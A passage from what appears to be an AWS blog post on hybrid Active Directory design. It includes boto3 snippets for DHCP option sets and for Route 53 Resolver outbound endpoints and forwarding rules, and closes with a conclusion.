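            {"Key": "domain-name-servers", "Values": ["10.0.0.10", "10.0.1.10"]},
        ]
    )
    ec2.associate_dhcp_options(
        DhcpOptionsId=options["DhcpOptions"]["DhcpOptionsId"],
        VpcId="vpc-0abc123def456",
    )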

An alternative is Amazon Route 53 Resolver. It lets you keep the Amazon-provided DNS in each VPC and use Resolver endpoints and forwarding rules to forward DNS queries for your Active Directory domains to the on-premises Active Directory or AWS Managed Microsoft AD. This is ideal for multi-account setups and for customers who want hub-and-spoke DNS management.

This alternative replaces EC2 instances running as DNS forwarders with a managed, scalable service, and Route 53 Resolver forwarding rules can be shared with other AWS accounts. Figure 5 shows a Route 53 Resolver forwarding a DNS query to the on-premises Active Directory (a brief API sketch follows Figure 5).

Figure 5. Route 53 Resolver
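
The moving parts are an outbound Resolver endpoint plus one forwarding rule per Active Directory domain. Here is a hedged boto3 sketch, assuming placeholder subnet, security group, VPC, and on-premises DNS values.

    import boto3

    r53r = boto3.client("route53resolver")

    # Hypothetical IDs and addresses, for illustration only.
    endpoint = r53r.create_resolver_endpoint(
        CreatorRequestId="ad-outbound-1",
        Name="ad-outbound",
        Direction="OUTBOUND",
        SecurityGroupIds=["sg-0abc123"],
        IpAddresses=[
            {"SubnetId": "subnet-0aaa111"},
            {"SubnetId": "subnet-0bbb222"},
        ],
    )

    rule = r53r.create_resolver_rule(
        CreatorRequestId="ad-forward-1",
        Name="forward-company-com",
        RuleType="FORWARD",
        DomainName="company.com",
        TargetIps=[{"Ip": "10.1.1.10", "Port": 53}],
        ResolverEndpointId=endpoint["ResolverEndpoint"]["Id"],
    )

    # Associate the rule with each VPC that needs it; the rule itself
    # can be shared with other accounts through AWS RAM.
    r53r.associate_resolver_rule(
        ResolverRuleId=rule["ResolverRule"]["Id"],
        VPCId="vpc-0abc123def456",
    )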

Conclusion

In this post, we described the benefits of using AWS Managed Microsoft AD to integrate with on-premises Active Directory and discussed a range of design considerations for architecting a hybrid Active Directory service with AWS Managed Microsoft AD. We reviewed design scenarios ranging from a single AWS account and region to multiple AWS accounts and regions, and we discussed choosing between Amazon VPC DHCP option sets and Route 53 Resolver for DNS resolution.

Further reading
